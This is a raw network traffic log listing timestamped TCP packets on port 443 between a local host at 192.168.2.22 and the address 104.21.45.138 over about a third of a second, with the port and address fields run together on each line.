                                                  Feb 14, 2024 08:29:57.870588064 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.870656013 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.870663881 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.870682001 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.870731115 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.870738983 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.872977972 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.873038054 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.873042107 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.873064995 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.873102903 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.965377092 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.965464115 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.965514898 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.965537071 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.965547085 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.965667009 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.967503071 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.967525005 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.967597961 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.967607021 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.967642069 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.967654943 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.969016075 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.969039917 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.969062090 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.969069004 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.969088078 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.971446991 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.971472979 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.971492052 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.971498013 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.971524000 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.971708059 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.973164082 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.973186016 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.973231077 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.973238945 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.973247051 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.973267078 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.975649118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.975681067 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.975740910 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.975740910 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.975749016 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.975878954 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.978338957 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.978395939 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.978409052 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.978461981 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.980079889 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.980149031 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.980154037 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.980178118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.980201006 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.980245113 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.982542992 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.982615948 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.982618093 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.982666016 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.982672930 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.984178066 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.984232903 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.984239101 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.984260082 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.984308004 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.984314919 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.986654043 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.986712933 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.986718893 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.986732960 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.986787081 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.986793995 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.988428116 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.988483906 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.988500118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.988524914 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.988554955 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.988697052 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.991020918 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.991086006 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.991090059 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.991111994 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.991142035 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.992714882 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.992784023 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.992799044 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.992830992 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.992877960 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.995043993 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.995102882 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.995111942 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.995143890 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.995179892 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.996802092 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.996870041 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.996870041 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.996895075 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.996928930 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.997010946 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.999341965 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.999403000 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.999495983 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:57.999969959 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:57.999978065 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.000003099 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.001065969 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.001137972 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.001142025 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.001163960 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.001200914 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.003448963 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.003508091 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.003515005 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.003530979 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.003638983 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.003662109 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.005224943 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.005290985 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.005326986 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.005332947 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.005361080 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.005455971 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.007633924 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.007698059 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.007698059 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.007723093 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.007750988 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.009511948 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.009577036 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.009582996 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.009615898 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.009649038 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.011898994 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.011960030 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.011960983 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.011986017 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.012013912 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.013725042 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.013787031 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.013803005 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.013825893 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.013860941 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.016031027 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.016089916 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.016097069 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.016107082 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.016153097 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.018579006 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.018642902 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.018646002 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.018668890 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.018695116 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.082549095 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.082628965 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.082648039 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.082695961 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.082715988 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.084748030 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.084810972 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.084815025 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.084846020 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.084876060 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.086447001 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.086524010 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.086535931 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.086569071 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.086596966 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.088833094 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.088892937 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.088898897 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.088923931 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.088954926 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.091167927 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.091228008 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.091238022 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.091260910 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.091296911 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.092890978 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.092942953 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.092955112 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.092969894 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.093028069 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.093034983 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.095426083 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.095487118 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.095499992 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.095532894 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.095568895 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.097784996 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.097829103 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.097839117 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.097847939 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.097855091 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.097909927 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.097915888 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.099558115 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.099600077 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.099607944 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.099618912 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.099632025 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.099689007 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.099695921 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.101380110 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.101440907 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.101443052 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.101468086 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.101505041 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.103787899 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.103849888 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.103861094 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.103890896 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.103928089 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.106122017 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.106184959 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.106188059 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.106211901 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.106237888 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.107881069 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.107938051 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.107950926 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.107973099 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.108006001 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.110538960 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.110598087 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.110601902 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.110625029 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.110652924 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.112193108 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.112250090 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.112261057 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.112282991 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.112325907 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.114577055 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.114634991 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.114639997 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.114660978 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.114684105 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.116348982 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.116399050 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.116406918 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.116427898 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.116482019 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.116487980 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.118752003 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.118820906 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.118829012 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.118853092 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.118885040 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.120640039 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.120692015 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.120698929 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.120717049 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.120768070 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.120774031 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.122955084 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.123009920 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.123017073 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.123040915 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.123073101 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.124782085 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.124839067 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.124850035 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.124875069 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.124918938 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.127269030 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.127327919 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.127334118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.127355099 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.127382040 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.129643917 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.129699945 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.129712105 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.129734993 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.129766941 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.131520987 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.131571054 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.131580114 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.131592989 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.131640911 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.131647110 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.133455038 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.133514881 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.133523941 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.133546114 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.133588076 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.135312080 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.135374069 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.135380983 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.135397911 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.135431051 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.137101889 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.137157917 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.137170076 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.137191057 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.137227058 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.138942003 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.139003992 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.139013052 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.139028072 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.139062881 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.140394926 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.140450001 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.140464067 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.140489101 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.140525103 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.142251015 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.142308950 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.142314911 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.142339945 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.142376900 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.143850088 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.143913031 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.143919945 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.143944979 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.143981934 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.145647049 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.145704031 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.145708084 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.145730972 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.145762920 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.146859884 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.146931887 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.146941900 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.146966934 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.147002935 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.148663044 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.148721933 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.148725033 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.148746967 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.148772955 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.150523901 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.150582075 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.150594950 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.150615931 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.150654078 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.152280092 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.152340889 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.152343988 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.152368069 CET44349171104.21.45.138192.168.2.22
